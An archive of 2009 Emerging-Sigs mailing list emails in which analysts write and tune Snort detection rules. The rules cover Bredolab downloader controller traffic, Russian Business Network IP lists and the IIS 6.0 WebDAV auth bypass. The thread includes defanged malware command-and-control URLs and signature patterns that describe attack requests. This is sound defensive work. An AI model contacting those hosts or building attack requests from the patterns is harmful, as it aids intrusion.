In-Reply-To: <839aec700905130903j772857fcwdcf65406f5c881ef@mail.gmail.com>
References: <839aec700905130903j772857fcwdcf65406f5c881ef@mail.gmail.com>
Message-ID: <839aec700905191828n24bf7b28i15c275caeacc2f30@mail.gmail.com>

On Wed, May 13, 2009 at 9:03 AM, Darren Spruell <phatbuckett at gmail.com> wrote:
> Looks to be a downloader communicating with backend management kit,
> characteristic URLs:
>
> hXXp://websitecheck.cn/nr/controller.php?action=bot&entity_list=&uid=&first=1&guid=5421361321&rnd=874493
> ? hXXp://turokgame.cn/bm/controller.php?action=bot&entity_list=&uid=1&first=1&guid=3858361321&rnd=923635
> ?hXXp://78.109.29.112/new/controller.php?action=bot&entity_list=&uid=1&first=1&guid=3970894049&rnd=981633
>
> Related (later stage)
>
> ?hXXp://78.109.29.112/new/controller.php?action=report&guid=0&rnd=981633&uid=1&entity=1239013921:unique_start;1239013932:unique_start;1239013964:unique_start;1239022982:unique_start;1239024633:unique_start;1239875139:unique_start
>
> http://www.threatexpert.com/report.aspx?md5=ffe09f9b2470575727ea72bcb3ebce0a
>
> Microsoft calls it Bredolab, others some variant of Downloader.

The Bredolab naming seems to be taking it; BManager is apparently only
the backend controller. MMPC reports Bredolab as responsible for
dropping a number of other prevalent threats on victim hosts:

"Bredolab is notorious for installing prevalent spam bots such as
Rustock, Cutwail, Srizbi, Tedroo and Rlsloup."

http://blogs.technet.com/mmpc/archive/2009/04/14/wheres-waledac.aspx

Updated rules:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN
Bredolab Downloader Communicating With Controller (1)";
flow:established,to_server; uricontent:"action="; nocase;
uricontent:"&entity_list="; nocase; uricontent:"&uid="; nocase;
uricontent:"&first="; uricontent:"&guid="; nocase; uricontent:"&rnd=";
nocase; classtype:trojan-activity;
reference:url,www.microsoft.com/security/portal/Entry.aspx?Name=TrojanDownloader:Win32/Bredolab.B;
sid:XXXXXXX; rev:2;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN
Bredolab Downloader Communicating With Controller (2)";
flow:established,to_server; uricontent:"action="; nocase;
uricontent:"&guid="; nocase; uricontent:"&rnd="; nocase;
uricontent:"&uid="; nocase; uricontent:"&entity="; nocase;
classtype:trojan-activity;
reference:url,www.microsoft.com/security/portal/Entry.aspx?Name=TrojanDownloader:Win32/Bredolab.B;
sid:XXXXXXX; rev:2;)

-- 
Darren Spruell
phatbuckett at gmail.com

From eoin.miller at trojanedbinaries.com  Tue May 19 22:36:21 2009
From: eoin.miller at trojanedbinaries.com (Eoin Miller)
Date: Tue, 19 May 2009 22:36:21 -0400
Subject: [Emerging-Sigs] IP List rulesets
In-Reply-To: <4A13383B.1000608@jonkmans.com>
References: <4A131D81.3040907@jonkmans.com>
	<4A133285.1060104@trojanedbinaries.com>
	<4A13383B.1000608@jonkmans.com>
Message-ID: <4A136CA5.1080303@trojanedbinaries.com>

I would venture a guess that if you add the SYN flag, but don't reverse
the direction of traffic flow in the rule, then you won't be triggering
any alerts.

HOME ->SYN-> RBN
HOME <-SYN/ACK<- RBN
HOME ->ACK-> RBN

alert tcp [<RBN IP LIST>] any -> $HOME_NET any (flags: S;) = nothing
alert tcp $HOME_NET any -> [<RBN IP LIST>] any (flags: S;) = alert!


Setting the SYN flag is defiantly where the optimization occurs. We
compared the Snort rule stats, and the SYN rule was run far fewer times
(only once per every new TCP connection attempted) instead of against
every IP packet seen across the wire.

--
Eoin Miller
eoin.miller at trojanedbinaries.com

Matt Jonkman wrote:
> Very good point on the Syn flag. I've added that to all of the tcp sigs.
> That could alone be a good chunk of the performance gain I'd guess.
>
> On reversing the order, I agree there. I wish I'd originally made these
> sigs for home_net -> outside. But I'm hesitant to change it now as many
> folks have blocking built on the assumed hostile source.
>
> Matt
>
> Eoin Miller wrote:
>> Matt,
>>
>> In our testing/breakup/optimization of the IP List rules
>> (RBN/BotCC/compromised/DShield), we did this a little differently for
>> the TCP rules.
>>
>> Vanilla TCP rule (Example):
>> alert tcp [<RBN IP LIST>] any -> $HOME_NET any (msg:"ET RBN Known
>> Russian Business Network IP TCP (1)";
>> reference:url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork;
>> threshold: type limit, track by_src, seconds 60, count 1;
>> classtype:misc-attack; sid:2406000; rev:129;)
>>
>> Modified TCP rule (Example):
>> alert tcp $HOME_NET any -> [<RBN IP LIST>] any (flags: S; msg:"ET RBN
>> Known Russian Business Network IP TCP (1)";
>> reference:url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork;
>> threshold: type limit, track by_src, seconds 60, count 1;
>> classtype:misc-attack; sid:2406000; rev:129;)
>>
>> The modified rule looks for the TCP SYN flag to be set in addition to
>> the $HOME_NET to be contacting the RBN's known IP's. This significantly
>> decreases the processor load because Snort will only compare the SRC/DST
>> address lists *if* the TCP SYN is set (or so it appears?). When you have
>> a large $HOME_NET, this appears to become even more important. Also, you
>> may notice we flipped the flow of traffic from $HOME_NET to the RBN
>> servers in our rule. This is because for us, we are monitoring NAT'd
>> hosts behind firewalls and are concerned more with our internal hosts
>> reaching out and attempting to establish a TCP session to potentially
>> dangerous sites that are doing drive by/malware hosting/phishing or
>> reaching out to potential C&C servers hosted by RBN. We are less
>> concerned with RBN sites attempting to connect in and create TCP
>> sessions to our clients desktop systems as they are NAT'd behind a
>> firewall.
>>
>> We also created an additional rule set to cover ICMP communications just
>> to keep tabs if anything starts communicating over it for some reason.
>> Again, please note that the SRC/DST have been flipped:
>>
>> New ICMP rule (Example):
>> alert icmp $HOME_NET -> [<RBN IP LIST>] (msg:"ET RBN Knwon Russian
>> Business Network IP ICMP (1)";
>> reference:url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork;
>> threshold: type limit, track by_src, seconds 60, count 1;
>> classtype:misc-attack; sid:2406000; rev:129;)
>>
>> We benchmarked the old RBN ruleset (which used "alert ip" type rules)
>> against the new one we created (using "alert tcp" w/TCP SYN flag and
>> "alert udp") using a 25GB pcap traffic capture.
>>
>> Rule Types | Time To Process 25GB of PCAP
>> ----------------------------------------------
>> alert ip = 1 hour, 3 minutes, 4 seconds
>> alert tcp/udp = 11 minutes, 43 seconds
>>
>> Additionally, the disk could not shove packets fast enough at Snort to
>> process the alert tcp/udp rule sets. The Snort instance only ran at
>> about 75% processor utilization during its super short 11 minutes of
>> processing. The processor was pegged at 100% during the alert ip rules
>> which took 1 hour. At our client site, we used to have to breakup the
>> RBN rule list into two separate rule lists/instances of Snort just to
>> monitor a 300MBit/s link without dropping packets in Snort (compiled
>> against MMAP LibPcap). This was for the RBN list ONLY. Now we can run
>> almost all of the IP list rules on a single processor core/instance of
>> Snort @ 300MBit/s without dropping even 0.01% of packets.
>>
>> It should be noted we are not running Snort in-line and these sigs
>> should really be for people running in purely IDS mode. Marty's new
>> super sweet IP BlackList preproc seems to be the way to go for you that
>> are running in-line.
>>
>> --
>> Eoin Miller
>> eoin.miller at trojanedbinaries.com
>


From frank at knobbe.us  Tue May 19 23:01:14 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Tue, 19 May 2009 22:01:14 -0500
Subject: [Emerging-Sigs] IP List rulesets
In-Reply-To: <4A136CA5.1080303@trojanedbinaries.com>
References: <4A131D81.3040907@jonkmans.com>
	<4A133285.1060104@trojanedbinaries.com>
	<4A13383B.1000608@jonkmans.com>
	<4A136CA5.1080303@trojanedbinaries.com>
Message-ID: <20090520030114.GA42575@knobbe.us>

On Tue, May 19, 2009 at 10:36:21PM -0400, Eoin Miller wrote:
> alert tcp [<RBN IP LIST>] any -> $HOME_NET any (flags: S;) = nothing
> alert tcp $HOME_NET any -> [<RBN IP LIST>] any (flags: S;) = alert!

If you do that, use "flags:S,12;" to avoid accidental evasion if reserved
bits are set.

Cheers,
Frank


From pepperjack at afferentsecurity.com  Wed May 20 09:08:30 2009
From: pepperjack at afferentsecurity.com (Jack Pepper)
Date: Wed, 20 May 2009 08:08:30 -0500
Subject: [Emerging-Sigs] IP List rulesets
In-Reply-To: <4A13383B.1000608@jonkmans.com>
References: <4A131D81.3040907@jonkmans.com>
	<4A133285.1060104@trojanedbinaries.com> <4A13383B.1000608@jonkmans.com>
Message-ID: <20090520080830.ifu18qi4qoscosgc@mail.afferentsecurity.com>

Quoting Matt Jonkman <jonkman at jonkmans.com>:

> On reversing the order, I agree there. I wish I'd originally made these
> sigs for home_net -> outside. But I'm hesitant to change it now as many
> folks have blocking built on the assumed hostile source.

yeah, definitely.  If you change the direction, it should definitely  
be a new SID range, and probably a new filename, because of how  
oinkmaster edits work.

tc

-- 

Framework?  I don't need no stinking framework!

----------------------------------------------------------------
@fferent Security Labs:  Isolate/Insulate/Innovate  
http://www.afferentsecurity.com


From spooker at gmail.com  Wed May 20 09:52:12 2009
From: spooker at gmail.com (Rodrigo Montoro(Sp0oKeR))
Date: Wed, 20 May 2009 10:52:12 -0300
Subject: [Emerging-Sigs] IP List rulesets
In-Reply-To: <20090520080830.ifu18qi4qoscosgc@mail.afferentsecurity.com>
References: <4A131D81.3040907@jonkmans.com>
	<4A133285.1060104@trojanedbinaries.com> 
	<4A13383B.1000608@jonkmans.com>
	<20090520080830.ifu18qi4qoscosgc@mail.afferentsecurity.com>
Message-ID: <9255886c0905200652w5283f10r31d97e0d4df3fca3@mail.gmail.com>

Using only Syn its not easy to create lot of FP using spoofed packets ?

I didnt test ipblacklist from Roesch yet but one of the point was the
possibilities about create spoofed packet with Syn flag only and
create lot of FP.



On Wed, May 20, 2009 at 10:08 AM, Jack Pepper
<pepperjack at afferentsecurity.com> wrote:
> Quoting Matt Jonkman <jonkman at jonkmans.com>:
>
>> On reversing the order, I agree there. I wish I'd originally made these
>> sigs for home_net -> outside. But I'm hesitant to change it now as many
>> folks have blocking built on the assumed hostile source.
>
> yeah, definitely. ?If you change the direction, it should definitely
> be a new SID range, and probably a new filename, because of how
> oinkmaster edits work.
>
> tc
>
> --
>
> Framework? ?I don't need no stinking framework!
>
> ----------------------------------------------------------------
> @fferent Security Labs: ?Isolate/Insulate/Innovate
> http://www.afferentsecurity.com
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>



-- 
===========================
Rodrigo Montoro (Sp0oKeR)
http://www.spooker.com.br
http://www.snort.org.br
http://www.linkedin.com/in/spooker
===========================

From jonkman at jonkmans.com  Wed May 20 12:18:38 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Wed, 20 May 2009 12:18:38 -0400
Subject: [Emerging-Sigs] IP List rulesets
In-Reply-To: <20090520030114.GA42575@knobbe.us>
References: <4A131D81.3040907@jonkmans.com>	<4A133285.1060104@trojanedbinaries.com>	<4A13383B.1000608@jonkmans.com>	<4A136CA5.1080303@trojanedbinaries.com>
	<20090520030114.GA42575@knobbe.us>
Message-ID: <4A142D5E.4050201@jonkmans.com>

What if, ignoring the reversing homenet/extnet thing, we just go with
flow:established on the tcp sigs and make it directionless?

That'll eliminate a lot of the noise and only give you an alert when you
have a box talking to them.

Then we don't need to open a new sid range or reverse the directions, so
no one has to redo blocking/response rules.

Matt

Frank Knobbe wrote:
> On Tue, May 19, 2009 at 10:36:21PM -0400, Eoin Miller wrote:
>> alert tcp [<RBN IP LIST>] any -> $HOME_NET any (flags: S;) = nothing
>> alert tcp $HOME_NET any -> [<RBN IP LIST>] any (flags: S;) = alert!
> 
> If you do that, use "flags:S,12;" to avoid accidental evasion if reserved
> bits are set.
> 
> Cheers,
> Frank
> 
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc



From jonkman at jonkmans.com  Wed May 20 12:24:58 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Wed, 20 May 2009 12:24:58 -0400
Subject: [Emerging-Sigs] BManager communication
In-Reply-To: <839aec700905191828n24bf7b28i15c275caeacc2f30@mail.gmail.com>
References: <839aec700905130903j772857fcwdcf65406f5c881ef@mail.gmail.com>
	<839aec700905191828n24bf7b28i15c275caeacc2f30@mail.gmail.com>
Message-ID: <4A142EDA.9050505@jonkmans.com>

Posting now, thanks Darren! Great research.

Matt

Darren Spruell wrote:
> On Wed, May 13, 2009 at 9:03 AM, Darren Spruell <phatbuckett at gmail.com> wrote:
>> Looks to be a downloader communicating with backend management kit,
>> characteristic URLs:
>>
>> hXXp://websitecheck.cn/nr/controller.php?action=bot&entity_list=&uid=&first=1&guid=5421361321&rnd=874493
>>   hXXp://turokgame.cn/bm/controller.php?action=bot&entity_list=&uid=1&first=1&guid=3858361321&rnd=923635
>>  hXXp://78.109.29.112/new/controller.php?action=bot&entity_list=&uid=1&first=1&guid=3970894049&rnd=981633
>>
>> Related (later stage)
>>
>>  hXXp://78.109.29.112/new/controller.php?action=report&guid=0&rnd=981633&uid=1&entity=1239013921:unique_start;1239013932:unique_start;1239013964:unique_start;1239022982:unique_start;1239024633:unique_start;1239875139:unique_start
>>
>> http://www.threatexpert.com/report.aspx?md5=ffe09f9b2470575727ea72bcb3ebce0a
>>
>> Microsoft calls it Bredolab, others some variant of Downloader.
> 
> The Bredolab naming seems to be taking it; BManager is apparently only
> the backend controller. MMPC reports Bredolab as responsible for
> dropping a number of other prevalent threats on victim hosts:
> 
> "Bredolab is notorious for installing prevalent spam bots such as
> Rustock, Cutwail, Srizbi, Tedroo and Rlsloup."
> 
> http://blogs.technet.com/mmpc/archive/2009/04/14/wheres-waledac.aspx
> 
> Updated rules:
> 
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN
> Bredolab Downloader Communicating With Controller (1)";
> flow:established,to_server; uricontent:"action="; nocase;
> uricontent:"&entity_list="; nocase; uricontent:"&uid="; nocase;
> uricontent:"&first="; uricontent:"&guid="; nocase; uricontent:"&rnd=";
> nocase; classtype:trojan-activity;
> reference:url,www.microsoft.com/security/portal/Entry.aspx?Name=TrojanDownloader:Win32/Bredolab.B;
> sid:XXXXXXX; rev:2;)
> 
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN
> Bredolab Downloader Communicating With Controller (2)";
> flow:established,to_server; uricontent:"action="; nocase;
> uricontent:"&guid="; nocase; uricontent:"&rnd="; nocase;
> uricontent:"&uid="; nocase; uricontent:"&entity="; nocase;
> classtype:trojan-activity;
> reference:url,www.microsoft.com/security/portal/Entry.aspx?Name=TrojanDownloader:Win32/Bredolab.B;
> sid:XXXXXXX; rev:2;)
> 

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc



From eoin.miller at trojanedbinaries.com  Wed May 20 13:47:02 2009
From: eoin.miller at trojanedbinaries.com (Eoin Miller)
Date: Wed, 20 May 2009 13:47:02 -0400
Subject: [Emerging-Sigs] IP List rulesets
In-Reply-To: <4A142D5E.4050201@jonkmans.com>
References: <4A131D81.3040907@jonkmans.com>	<4A133285.1060104@trojanedbinaries.com>	<4A13383B.1000608@jonkmans.com>	<4A136CA5.1080303@trojanedbinaries.com>
	<20090520030114.GA42575@knobbe.us> <4A142D5E.4050201@jonkmans.com>
Message-ID: <4A144216.6020804@trojanedbinaries.com>

Matt,

I am trying that out right now, and it doesn't help the performance. I
am seeing about 60-70% packet loss using only the RBN rules on the
~250mbit link. Using flow:established still requires the rules to be
triggered and processed for every single TCP packet that flows across
the wire. 

--
Eoin Miller


Matt Jonkman wrote:
> What if, ignoring the reversing homenet/extnet thing, we just go with
> flow:established on the tcp sigs and make it directionless?
>
> That'll eliminate a lot of the noise and only give you an alert when you
> have a box talking to them.
>
> Then we don't need to open a new sid range or reverse the directions, so
> no one has to redo blocking/response rules.
>
> Matt
>
> Frank Knobbe wrote:
>   
>> On Tue, May 19, 2009 at 10:36:21PM -0400, Eoin Miller wrote:
>>     
>>> alert tcp [<RBN IP LIST>] any -> $HOME_NET any (flags: S;) = nothing
>>> alert tcp $HOME_NET any -> [<RBN IP LIST>] any (flags: S;) = alert!
>>>       
>> If you do that, use "flags:S,12;" to avoid accidental evasion if reserved
>> bits are set.
>>
>> Cheers,
>> Frank
>>
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>     
>
>   


From wkitty42 at windstream.net  Wed May 20 14:34:13 2009
From: wkitty42 at windstream.net (waldo kitty)
Date: Wed, 20 May 2009 14:34:13 -0400
Subject: [Emerging-Sigs] IP List rulesets
In-Reply-To: <20090520080830.ifu18qi4qoscosgc@mail.afferentsecurity.com>
References: <4A131D81.3040907@jonkmans.com>	<4A133285.1060104@trojanedbinaries.com>
	<4A13383B.1000608@jonkmans.com>
	<20090520080830.ifu18qi4qoscosgc@mail.afferentsecurity.com>
Message-ID: <4A144D25.8040302@windstream.net>

Jack Pepper wrote:
> Quoting Matt Jonkman <jonkman at jonkmans.com>:
> 
>> On reversing the order, I agree there. I wish I'd originally made these
>> sigs for home_net -> outside. But I'm hesitant to change it now as many
>> folks have blocking built on the assumed hostile source.
> 
> yeah, definitely.  If you change the direction, it should definitely  
> be a new SID range, and probably a new filename, because of how  
> oinkmaster edits work.

not only that but also, as already mentioned, some folk already have blocking 
plans in place using the existing format... we use a blanket drop on any traffic 
from any RBN addresses in the list so it doesn't matter, as far as we are 
concerned, if the traffic originated from inside our network or not...

we do, however, want to find that machine that initiated that connection and 
give it a swift kick if/when needed so the "flipside" rules are also welcome ;)


-- 
        _\/
       (@@)                      Waldo Kitty, Waldo's Place USA
__ooO_( )_Ooo_____________________ telnet://bbs.wpusa.dynip.com
_|_____|_____|_____|_____|_____|_____ http://www.wpusa.dynip.com
____|_____|_____|_____|_____|_____|____ ftp://ftp.wpusa.dynip.com
_|_Eat_SPAM_to_email_me!_YUM!__|_____ wkitty42 -at- windstream.net

From frank at knobbe.us  Wed May 20 20:15:52 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Wed, 20 May 2009 19:15:52 -0500
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>
	<cf939bff0905191648g6b5fa297jacb41ecba14c662b@mail.gmail.com>
	<9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com>
Message-ID: <1242864952.97653.19.camel@localhost>

On Tue, 2009-05-19 at 21:02 -0300, Rodrigo Montoro(Sp0oKeR) wrote:
> http://vrt-sourcefire.blogspot.com/2009/05/snort-protection-against-iis-60-webdav.html

You mean
http://vrt-sourcefire.blogspot.com/2009/05/rules-to-detect-iis-60-webdav-exploit.html  ?

:)

Frank


-- 
It is said that the Internet is a public utility. As such, it is best
compared to a sewer. A big, fat pipe with a bunch of crap sloshing
against your ports.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 188 bytes
Desc: This is a digitally signed message part
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090520/e56c6646/attachment.bin

From frank at knobbe.us  Wed May 20 20:30:46 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Wed, 20 May 2009 19:30:46 -0500
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <cf939bff0905191720t1b4a83cbu6cfeeeb62a31848b@mail.gmail.com>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>
	<cf939bff0905191648g6b5fa297jacb41ecba14c662b@mail.gmail.com>
	<9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com>
	<cf939bff0905191720t1b4a83cbu6cfeeeb62a31848b@mail.gmail.com>
Message-ID: <1242865846.97653.27.camel@localhost>

On Tue, 2009-05-19 at 18:20 -0600, Joshua Gimer wrote:
> Well that it good and all, but if you want something a little more
> specific in the alert msg here is a (minimally) optimized GET method
> rule:
> 
> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
> Auth Bypass - GET METHOD"; content:"Translate:"; nocase;
> pcre:"/GET.*%..%.*HTTP/Bi"; pcre:"/Translate: *f/i";
> reference:url,isc.sans.org/diary.html?storyid=6397;sid:1000004;
> rev:1;)

Not like that :)

Add a " content:"GET "; depth:4; " to the beginning to help performance.
The colons in the content and pcre match are not escaped. Are you sure
the second pcre is necessary?

How about:

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS
(msg:"CURRENT_EVENTS IIS6.0 WebDav RemoteAuth Bypass - GET METHOD";
flow:to_server,established; content:"GET "; depth:4; content:"Translate|
3a| f"; nocase; pcre:"/GET.*%..%.*HTTP/Bi";
classtype:web-application-attack;
reference:url,isc.sans.org/diary.html?storyid=6397; sid:xxxxxxxx;
rev:1;)

And of course one for POST, HEAD, and perhaps COPY, MOVE and DAV?

-Frank

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 188 bytes
Desc: This is a digitally signed message part
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090520/6f96ee68/attachment.bin

From eslerj at gmail.com  Wed May 20 20:41:09 2009
From: eslerj at gmail.com (Joel Esler)
Date: Wed, 20 May 2009 20:41:09 -0400
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <1242865846.97653.27.camel@localhost>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>
	<cf939bff0905191648g6b5fa297jacb41ecba14c662b@mail.gmail.com>
	<9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com>
	<cf939bff0905191720t1b4a83cbu6cfeeeb62a31848b@mail.gmail.com>
	<1242865846.97653.27.camel@localhost>
Message-ID: <314cf0830905201741o1b211c70o526e196017745a3d@mail.gmail.com>

On Wed, May 20, 2009 at 8:30 PM, Frank Knobbe <frank at knobbe.us> wrote:

> On Tue, 2009-05-19 at 18:20 -0600, Joshua Gimer wrote:
> > Well that it good and all, but if you want something a little more
> > specific in the alert msg here is a (minimally) optimized GET method
> > rule:
> >
> > alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
> > Auth Bypass - GET METHOD"; content:"Translate:"; nocase;
> > pcre:"/GET.*%..%.*HTTP/Bi"; pcre:"/Translate: *f/i";
> > reference:url,isc.sans.org/diary.html?storyid=6397;sid:1000004;
> > rev:1;)
>
> Not like that :)
>
> Add a " content:"GET "; depth:4; " to the beginning to help performance.
> The colons in the content and pcre match are not escaped. Are you sure
> the second pcre is necessary?
>
> How about:
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS
> (msg:"CURRENT_EVENTS IIS6.0 WebDav RemoteAuth Bypass - GET METHOD";
> flow:to_server,established; content:"GET "; depth:4; content:"Translate|
> 3a| f"; nocase; pcre:"/GET.*%..%.*HTTP/Bi";
> classtype:web-application-attack;
> reference:url,isc.sans.org/diary.html?storyid=6397; sid:xxxxxxxx;
> rev:1;)
>

Does anyone have, just a mess of http requests in pcap form?  Perhaps with
this exploit in it?  I have some, but if someone has a good big pcap, that
would be more ideal.

Reason I am asking is --

Many people have said over the years to add a "GET" or a "POST" to improve
performance, or to reduce falses, etc..  I'd like to run a bunch of tests
for these theories, which I will publish, but if someone has a big pcap I
can have, that would be great.

Usual non-disclosures of content within the pcap would of course be
applied.  If you have a pcap I can use, you know, maybe 20 Mb's and up?
300-400 would be nice.

Full session please, not just the request portions.

Contact me off list if you wish.



-- 
joel esler
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090520/98092c4d/attachment.html

From frank at knobbe.us  Wed May 20 20:49:09 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Wed, 20 May 2009 19:49:09 -0500
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <314cf0830905201741o1b211c70o526e196017745a3d@mail.gmail.com>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>
	<cf939bff0905191648g6b5fa297jacb41ecba14c662b@mail.gmail.com>
	<9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com>
	<cf939bff0905191720t1b4a83cbu6cfeeeb62a31848b@mail.gmail.com>
	<1242865846.97653.27.camel@localhost>
	<314cf0830905201741o1b211c70o526e196017745a3d@mail.gmail.com>
Message-ID: <1242866949.97653.35.camel@localhost>

On Wed, 2009-05-20 at 20:41 -0400, Joel Esler wrote:

> Many people have said over the years to add a "GET" or a "POST" to
> improve performance, or to reduce falses, etc..  

Hey, that wasn't you? ;)

It's important to stress that GET|POST matches should be done with
offset 0 and depth 4|5 (incl space). That's the whole point. Avoid
looking into the whole packet for GET|POST. Just do a quick check at the
beginning of the packet (hey, 4-5 bytes, how long can that take? :) and
if GET|POST|HEAD|etc is present, then do the longer content checks
including pcre.

Granted, if you only look for one content match, adding the GET check
might actually be longer since Snort now has to do two lookups. But for
any more complex checks (multiple content, pcre, etc), I think a quick
out of no GET is present would increase performance. Coming to think of
it, just a single match has to matched anywhere in the packet, so you
have to go the match sliding through the packet (but I admit, I'm not
sure how Snort does the match. My guess is that it's not a
"for(i=0;i<packet_length-match_length;i++) if(!strncmp(packet
+i,string))" sorta lookup.

But I head ya! I'd like to see such test results too! 

Cheers,
Frank





> I'd like to run a bunch of tests for these theories, which I will
> publish, but if someone has a big pcap I can have, that would be
> great.
> 
> Usual non-disclosures of content within the pcap would of course be
> applied.  If you have a pcap I can use, you know, maybe 20 Mb's and
> up?  300-400 would be nice.
> 
> Full session please, not just the request portions.  
> 
> Contact me off list if you wish.
> 
> 
> 
> 
> -- 
> joel esler
-- 
It is said that the Internet is a public utility. As such, it is best
compared to a sewer. A big, fat pipe with a bunch of crap sloshing
against your ports.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 188 bytes
Desc: This is a digitally signed message part
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090520/d08612f2/attachment-0001.bin

From eslerj at gmail.com  Wed May 20 20:56:22 2009
From: eslerj at gmail.com (Joel Esler)
Date: Wed, 20 May 2009 20:56:22 -0400
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <1242866949.97653.35.camel@localhost>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>
	<cf939bff0905191648g6b5fa297jacb41ecba14c662b@mail.gmail.com>
	<9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com>
	<cf939bff0905191720t1b4a83cbu6cfeeeb62a31848b@mail.gmail.com>
	<1242865846.97653.27.camel@localhost>
	<314cf0830905201741o1b211c70o526e196017745a3d@mail.gmail.com>
	<1242866949.97653.35.camel@localhost>
Message-ID: <314cf0830905201756q445d743era74da741213a0e66@mail.gmail.com>

On Wed, May 20, 2009 at 8:49 PM, Frank Knobbe <frank at knobbe.us> wrote:

> On Wed, 2009-05-20 at 20:41 -0400, Joel Esler wrote:
>
> > Many people have said over the years to add a "GET" or a "POST" to
> > improve performance, or to reduce falses, etc..
>
> Hey, that wasn't you? ;)


No, I've always said "the http_inspect preprocessor should validate that"
I've never said to do it one way or the other, in fact, I've probably said
remove it.  Read below to find out more...


>
>
> It's important to stress that GET|POST matches should be done with
> offset 0 and depth 4|5 (incl space). That's the whole point. Avoid
> looking into the whole packet for GET|POST. Just do a quick check at the
> beginning of the packet (hey, 4-5 bytes, how long can that take? :) and
> if GET|POST|HEAD|etc is present, then do the longer content checks
> including pcre.
>
> Granted, if you only look for one content match, adding the GET check
> might actually be longer since Snort now has to do two lookups. But for
> any more complex checks (multiple content, pcre, etc), I think a quick
> out of no GET is present would increase performance. Coming to think of
> it, just a single match has to matched anywhere in the packet, so you
> have to go the match sliding through the packet (but I admit, I'm not
> sure how Snort does the match. My guess is that it's not a
> "for(i=0;i<packet_length-match_length;i++) if(!strncmp(packet
> +i,string))" sorta lookup.
>
> But I head ya! I'd like to see such test results too!
>
>
When Snort starts, (this is going to be basic), Snort looks at the ruleset
and memorizes the longest content match within the rule.  This content match
is then used within the engine for the FP matcher.

My personal theory, (and this is why i want a big pcap to test with), is
that doing a content match for "GET" and "POST" would be pointless, and
actually slower than having a rule without it, since GET or POST is probably
not going to be the longest content match.  (not everytime, but most
likely.)  This is actually generating ANOTHER step, which will slow the
engine down, not significantly, but it should be slower than without.

Again, just my theory, I'd like to test it, I have the testbed set up to do
it, I just need a bigger HTTP pcap.



-- 
joel esler
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090520/6276a5d9/attachment.html

From frank at knobbe.us  Wed May 20 21:05:13 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Wed, 20 May 2009 20:05:13 -0500
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <314cf0830905201756q445d743era74da741213a0e66@mail.gmail.com>
References: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>
	<cf939bff0905191648g6b5fa297jacb41ecba14c662b@mail.gmail.com>
